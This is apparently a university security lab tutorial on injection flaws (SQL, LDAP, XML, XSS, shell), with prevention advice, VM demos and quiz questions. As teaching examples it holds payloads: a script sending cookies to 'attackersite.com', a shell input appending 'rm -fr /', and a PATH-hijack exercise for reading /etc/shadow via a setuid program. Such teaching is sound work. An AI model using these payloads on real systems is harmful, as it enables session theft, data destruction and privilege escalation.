Injection

Injection flaws allow attackers to relay malicious code through an application to another system.
Any application that allows execution of external commands such as system calls, shell commands, and SQL requests is susceptible to an Injection Attack.

Command Injection is a type of attack where the attacker's goal is to execute arbitrary commands on the host OS via a vulnerable application.
For example, exploiting a buffer overflow vulnerability that spawns a shell to execute arbitrary OS commands is an example of Command Injection.
This is different from Code Injection where the attacker sends input with the goal of exploiting the syntax of the targetted interpretter, without the necessity of executing OS commands.

Most web applications injection vulnerabilities are code injection vulnerabilities.
Code Injection, though, often leads to Command Injection.
In fact, many types of attacks, including SQL injection, have command injection as an end primary goal to gaining control of the server.

Essentially command injection often stems from code injection, but it doesn't always have to.
See Demos for examples of code injection, code injection leading to command injection, and command injection that does not stem from code injection.

• Sql Injection

  SQL injection takes advantage of the syntax of SQL to inject commands that can read or modify a database.
  Consider an example of a sign in form, where a user provides their username and password to login. The sql query used by the application might look something like this: SELECT Users.Username FROM Users WHERE Users.Username = 'Username' AND Users.Password = 'Password' where Username and Password is retrieved from user input. Access is granted if the query returns any rows. However, if an attacker enters a valid Username and injects some 'valid' code ("password' OR '1'='1") in the Password field, then the resulting query will look something like this: SELECT Users.Username FROM Users WHERE Users.Username = 'Username' AND Users.Password = 'password' OR '1'='1' "'1'='1'" will always be true and many rows will be returned, thereby allowing access. The technique may be refined to allow multiple statements to run, or even to load up and run external programs.

  Prevention

  SQL injection can be completely prevented by using prepared statements properly. That is, the application would ideally prepare a query with placeholder parameters and send it in the database to generate a query tree. Then at execution time, the user supplied parameters replace the placeholder paremeters in the query tree. This way, the sql query can not be misinterpreted. Example of using prepared statements in PHP
  
  Alternatively, one can whitelist (only allow certain characters) or blacklist (disallow characters that could alter a query) user input to prevent sql injection. Note that whitelisting is better than blacklisting, and using prepared statements is an even more secure option.

• LDAP Injection

  LDAP stands for Lightweight Directory Access Protocol.
  It is a hierachical database used to store organizational information such as student data and credentials.

  Services like Microsoft Active Directory & openLDAP are common implementation of the LDAP protocol.
  Applications that use the LDAP protocol typically accept a filter specified from user input to search in the LDAP database.
  

  LDAP injection is similar to SQL injection in that an attacker tries to exploit the syntax of an LDAP query.
  For example, consider the following java snippet that prints out the ldap query constructed by the application using user input $userName: String ldapSearchQuery = "(cn=" + $userName + ")"; System.out.println(ldapSearchQuery); If the variable $userName is not validated, it could be possible accomplish LDAP injection, as follows:

  • If a user puts “*” on box search, the system may return all the usernames on the LDAP directory
  • If a user puts “jonys) (| (password = * ) )”, it will generate the code bellow revealing jonys’ password ( cn = jonys ) ( | (password = * ) )
  where "|" represents a logical OR in ldap syntax and brackets are used to separate filters.

  Prevention

  Similar to prevention of SQL injection, one can prevent LDAP injection via a whitelisting (only allowing alphabets and letters for example) or a blacklisting approach (disallowing characters like "|", "(", ")", "&", etc which are common in LDAP syntax).

• XML Injection

  XML injection happens when the user input exploits the xml parser to change the execution of an application.
  Consider the example below, where we have a simple form submission to a web application:

  http://www.example.com/addUser.php?username=tony&password=asd123&email=user@email.com Suppose the server side code parses the above GET request and generates the following xml node to be inserted in an xml document: <user> <username>tony</username> <password>asd123</password> <mail>user@email.com</mail> </user> Without input validation, a malicious user can send a GET request like: http://www.example.com/addUser.php?username=tony&password=asd123&email=s4tan@hell.com</mail></user><user><username>anthony</username><password>qwerty</password><admin>true</admin><mail>hacker@email.com Which would result in insertion of an unintended node in the xml document: <user> <username>tony</username> <password>asd123</password> <mail>user@email.com</mail> </user> <user> <username>anthony</username> <password>qwerty</password> <admin>true</admin> <mail>hacker@email.com</mail> </user>

  Prevention

  A common mechanism for checking XML for attempted injection is to validate it using a schema (a type of whitelisting approach).
  For example, see https://www.securecoding.cert.org/confluence/display/java/IDS16-J.+Prevent+XML+Injection

• Cross Site Scripting

  Cross-Site Scripting, or "XSS" refers to an injection flaw where unchecked user input (typically javascript code) is placed onto a web page
  For example, A web server has a guestbook script, which accepts messages from user such as:good site!If the script is vulnerable to XSS, malicious users can inject html and javascript code such as:

  Nice site, I think I'll take it. <script>document.location="http://attackersite.com/cookie.cgi?" + document.cookie</script> When another user views the guestbook page, the code injected by the attacker will be executed on the user's browser - allowing the attacker to impersonate another user

  Prevention

  Essentially, sanitize and ideally whitelist all input going into the server as well as coming out of the server.

• Shell Injection

  Shell Injection is often referred to as command injection as it allows for shell commands to be injected in the OS.
  Note however, that this type of injection occurs when the attacker exploits the shell interpreter, which by our definitions, is code injection. So, Shell Injection is really an example of Code Injection leading to Command injection!

  Essentially, if an application uses an underlying program along with some user input to complete some functionality, then an attacker may be able to inject shell commands by exploting the shell interpreter.

  For example, consider the following php code which reads the file identified by the filename specified by a user:

  <?php echo shell_exec('cat '.$_GET['filename']); ?> An attacker would take advantage of the syntax understood by the shell interpreter like "|", ";", ">", "<", etc to run arbitrary shell commands! Ex: www.mysite.com/viewcontent.php?filename=my_great_content.txt;rm-fr /

  Prevention

  Once again, sanitizing user input is the key to preventing most code injections exploits, including shell injection.
  At minimum, the application should strip out characters that could exploit the syntax of the shell interpreter.
  
  Applications could also use filters available by the programming languages for the purposes of sanitizing data. For example, PHP has functions like excapeshellarg and escapeshellcmd which could be used as filters on user input.
  The best approach, however, is to carefully white-list and sanitize input data.

• Other Injection Types

  • Header Injection (opens Header Injection section of Session Fixation Page): Bad code can allow users to inject http headers as part of http request
  • Remote File Injection: Entire php scripts can be injected into an application that partly uses user input to include a php script!
  • Dynamic Evaluation Vulnerabilities: allows attackers to inject arbitrary code when an attacker is able to control all or part of an input string that is fed to the eval() function call
  • Log Injection: occurs when an application uses user input directly in a log - a malicious user could then potentially inject misleading date int he logs
  • ... and many others, unfortunately: http://phpsecurity.readthedocs.org/en/latest/Injection-Attacks.html

• Whitelist (If can't, Blacklist) your inputs. Know your inputs and never trust user.
• If a whitelist is not possible, create as strict as possible input filters. (i.e. PHP has escapeshellarg and escapeshellcmd function)
• Use safer alternatives to functions like system()
• Use prepared statements, parameterized queries for sql
• Priciple of least privilege: ensure that applications and databases have the minimum amount of privileges required, run processes with minimal privileges, restrict permissions on directories.
• Defense in depth - Secure all layers: application (whitelist), network(firewall rules), db(remove unnecessary functionalities, use appropriate privileges)
• Don’t display server/database related information and errors to users. Alternatively, show custom messages

Installation Instructions

1. Grab a copy of CustomUbuntu804Server.zip from /virtual/injection/ directory on the dh2020pc00 machine.
   Ex: scp $USER@dh2020pc00.utm.utoronto.ca:/virtual/injection/CustomUbuntu804Server.zip /virtual/$USER
   cd /virtual/$USER
   unzip CustomUbuntu804Server.zip
2. Run Vmplayer, open a VM you just unzipped, USE Nat or VMNET8 for Network Adapter setting
3. Login with username root and password password
4. Note down the ipaddress shown (/sbin/ifconfig should show you the ip address if you missed it).
   We will refer to $ipaddress as the ipaddress that showed up for you, for the subsequent steps.

XML Injection Demo (Code Injection)

1. On your host browser, go to $ipaddress/xmlvuln.php
2. Add the item "Buy more milk" to the todo list
3. Exercise A: Can you add an item that will break the application?
4. Exercise B: Rewrite xmlvuln.php to make it secure against XML Injection

Shell Injection Demo (Code Injection leading to Command Injection)

1. On your host browser, go to $ipaddress/whois.php
2. Try inputting a domain for whois lookup, like yahoo.ca (Note: this will only work if you have outgoing internet connection)
3. What happens when you add semicolon at the end? Is there an error?
4. Try the input ;uname -a in the whois lookup - what did it output?
5. Exercise: Rewrite whois.php to make it secure against Shell Injection

Pure Command Injection

Suppose you, as a hacker, have an account on the system with normal user permission.
You would like to be able to inject arbitrary OS commands as root - more specifically, say you want to print out the contents of /etc/shadow file
You try cat /etc/shadow but you get permission denied! what do you do?

Suppose you discovered that there is a program /vulnerable/account that is a setuid program (i.e the program runs as root), and you also have access to the source code /vulnerable/account.c
Upon investigation of the source code, you realize that the account program calls the external cat binary to display a user's balance.
Now you have all you need to make an exploit that will let you inject arbitrary OS Commands, without exploiting any code injection vulnerabilities! How so?

1. On the VM, su hacker
2. bash
3. /vulnerable/account test - what is the output?
4. cd /home/hacker/bin
5. ls
6. ./cat - what is the output? Take a look at the source code in cat.c
7. export PATH=/home/hacker/bin:$PATH - What does this do? Why do we do this?
8. echo $PATH
9. /vulnerable/account test - what was the output this time? How did that happen!

1. What's the difference between Code Injection and Command Injection?
2. For the following questoin, pick the best answer.

   Shell Injection is an example of:

   1. Code Injection
   2. Code Injection leading to Command Injection
   3. Command Injection
   4. A & B
   5. B & C
   6. A, B, & C
   7. None, this is a trick question! is it really though? ;)

3. What is LDAP? In what sense is LDAP Injection similar to SQL injection?
4. List 5 types of code injection types and mitigations against them
5. Give an example of when code injection via sql injection would lead to command injection
6. Give an example of Command Injection that does not stem from code injection
7. What is the difference between whitelisting and blacklisting? Which is better? Why?
8. Describe the priciple of least privilege and give an example of how you would apply it to prevent injection flaws
9. Bonus: Is P=NP?

• OWASP A1 Injection - https://www.owasp.org/index.php/Top_10_2013-A1-Injection
• Injection Flaws - https://www.owasp.org/index.php/Injection_Flaws
• Interpreter Injection - https://www.owasp.org/index.php/Interpreter_Injection
• OS Injection - https://www.owasp.org/index.php/OS_Injection
• Command Injection - https://www.owasp.org/index.php/Command_Injection
• OWASP Top 10 Cheatsheet - https://www.owasp.org/index.php/OWASP_Top_Ten_Cheat_Sheet
• What is LDAP used for - http://stackoverflow.com/questions/239385/what-is-ldap-used-for
• LDAP Injection - http://searchsoftwarequality.techtarget.com/definition/LDAP-injection
• Injection Attacks - http://phpsecurity.readthedocs.org/en/latest/Injection-Attacks.html
• Types of Injection - http://en.wikipedia.org/wiki/Code_injection